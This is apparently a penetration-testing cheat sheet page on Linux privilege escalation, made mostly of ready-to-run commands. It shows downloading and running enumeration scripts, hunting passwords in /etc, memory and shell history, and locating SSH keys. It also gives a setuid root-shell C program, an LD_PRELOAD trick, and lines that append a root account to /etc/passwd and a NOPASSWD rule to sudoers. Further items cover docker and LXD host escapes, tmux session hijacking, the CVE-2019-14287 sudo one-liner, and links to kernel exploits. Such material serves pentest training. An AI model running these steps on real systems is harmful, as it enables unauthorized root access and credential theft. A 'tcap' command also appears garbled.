Privilege escalation - Linux
Become VeryLazyTech member! π
Follow us on:
β Twitter @VeryLazyTech.
πΎ Github @VeryLazyTech.
π Medium @VeryLazyTech.
πΊ YouTube @VeryLazyTech.
π© Telegram @VeryLazyTech.
π΅οΈββοΈ My Site @VeryLazyTech.
Visit our shop for e-books and courses. π
Privilege escalation is a critical step in the post-exploitation phase, where attackers elevate their access to a higher privilege level. This guide will focus on practical techniques and commands to identify and exploit various privilege escalation vulnerabilities in Linux. It includes tools, methods for finding sensitive information, exploiting misconfigurations, and utilizing kernel vulnerabilities. Every method will have corresponding commands to enhance its practicality.
Tools
These tools are essential for finding and exploiting privilege escalation vulnerabilities:
LinPEAS: Privilege Escalation auditing script.
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh chmod +x linpeas.sh ./linpeas.sh
Linux Exploit Suggester: Suggests potential exploits based on system vulnerabilities.
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh chmod +x linux-exploit-suggester.sh ./linux-exploit-suggester.sh
Pspy: Monitors processes without root access.
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64 chmod +x pspy64 ./pspy64
Checklist
System information:
Gather system information:
uname -a cat /etc/*release id
Check running processes:
ps aux
Check kernel version: Kernel Exploits
uname -r
List users on the system:
cat /etc/passwd
Check available shell history:
cat ~/.bash_history
PATH Variable & Writable Folders
Check if any folder in the PATH is writable:
echo $PATH ls -ld $(echo $PATH | tr ":" "\n") | grep "w"
Environment Variables
Check environment variables for sensitive information:
env
Kernel Exploits
Search for kernel exploits using scripts (e.g., DirtyCow):
./linux-exploit-suggester.sh
Check for specific kernel exploits like DirtyCow:
https://github.com/dirtycow/dirtycow.github.io
Check if the sudo version is vulnerable:
sudo -V
Dmesg: Signature Verification Failed
Look for kernel errors or issues related to signature verification:
dmesg | grep -i signature
More System Enumeration
Check System Information (Date, System Stats, CPU Info)
Date and Time: (Helps you synchronize your actions with scheduled jobs or detect potential time-based misconfigurations)
date
CPU info: (Identifies the system architecture to tailor exploits to the specific processor type)
cat /proc/cpuinfo
Check for printers: (Identifies networked printers, which could be exploited for lateral movement or sensitive data interception)
lpstat -p
Check for writable files:
find / -writable -type f 2>/dev/null
Looting for Passwords
Files Containing Passwords
Common files where passwords are stored:
grep -r "password" /etc/* 2>/dev/null
grep -r "PASSWORD" /etc/* 2>/dev/null
Old Passwords in /etc/security/opasswd
cat /etc/security/opasswd
Last Edited Files
find / -type f -printf '%TY-%Tm-%Td %TT %p\n' 2>/dev/null | sort -r | head
In-Memory Passwords
Dump memory to search for passwords:
strings /dev/mem | grep -i password
Find Sensitive Files
SSH Key
Search for SSH keys on the system:
find / -name "id_rsa" 2>/dev/null
Scheduled Tasks
Cron Jobs
Check cron jobs:
bashCopy codecat /etc/crontab
ls -la /etc/cron.*
ls -la /var/spool/cron/crontabs
If you find a writable cron job, you can inject your own commands.
Systemd Timers
List systemd timers that could be manipulated:
systemctl list-timers
SUID
Find SUID Binaries (https://gtfobins.github.io/)
SUID binaries run with elevated privileges:
find / -perm -4000 -type f 2>/dev/null
Create a SUID Binary
If you can create a SUID binary, you can escalate privileges:
cCopy code#include <stdio.h>
#include <unistd.h>
int main() {
setuid(0);
system("/bin/bash");
return 0;
}
Compile and set SUID:
gcc -o suid_binary suid_binary.c
chmod +s suid_binary
Capabilities
List Capabilities of Binaries
Linux capabilities allow binaries to perform privileged operations:
getcap -r / 2>/dev/null
Edit Capabilities
If you find writable binaries with capabilities:
tcap cap_setuid+ep /path/to/binary
Interesting Capabilities
Look for binaries with capabilities like cap_setuid
, cap_dac_override
, or cap_sys_admin
that can help escalate privileges.
SUDO
NOPASSWD
Look for sudo privileges without requiring a password:
sudo -l
LD_PRELOAD and NOPASSWD
Use LD_PRELOAD
to exploit vulnerable binaries:
bashCopy codeecho 'int getuid() {return 0;}' > preload.c
gcc -shared -o preload.so preload.c -fPIC
sudo LD_PRELOAD=./preload.so /path/to/command
Doas
Doas is an alternative to sudo. Check if it's configured:
doas -s
Writable Files
Writable /etc/passwd
If /etc/passwd
is writable, you can modify it to create a new user:
echo 'hacker:x:0:0:hacker:/root:/bin/bash' >> /etc/passwd
Writable /etc/sudoers
If writable, add a new sudo rule:
echo 'hacker ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
NFS Root Squashing
If root squashing is disabled, mount the NFS share and escalate privileges:
mount -o rw,vers=3 nfs_server:/share /mnt
Shared Library Exploits
ldconfig
Check for writable paths in ldconfig
:
ldconfig -p
RPATH
RPATH allows binaries to specify search paths for libraries. If vulnerable, this can be exploited by injecting malicious libraries.
Docker and LXC/LXD
Docker
If the user is part of the docker
group, they can escalate privileges:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
LXC/LXD
Exploit LXD by importing an image:
lxc image import ./rootfs.tar.xz --alias privesc
lxc init privesc privesc-container -c security.privileged=true
lxc start privesc-container
lxc exec privesc-container /bin/sh
Hijack TMUX Session
If a TMUX session is running as root, hijack it:
tmux ls
tmux attach -t <session-id>
Kernel Exploits
CVE-2022-0847 (DirtyPipe)
Exploit DirtyPipe for privilege escalation:
https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
CVE-2016-5195 (DirtyCow)
Exploit DirtyCow for privilege escalation:
https://github.com/dirtycow/dirtycow.github.io
CVE-2010-3904 (RDS)
RDS socket vulnerability:
https://www.exploit-db.com/exploits/15285
CVE-2010-4258 (Full Nelson)
Full Nelson exploit for privilege escalation:
https://www.exploit-db.com/exploits/15704
CVE-2019-14287
This exploit allows for privilege escalation if a misconfigured sudo is in place:
sudo -u#-1 /bin/bash
CVE-2012-0056 (Mempodipper)
Mempodipper is a kernel exploit for privilege escalation:
https://www.exploit-db.com/exploits/18411
Last updated
Was this helpful?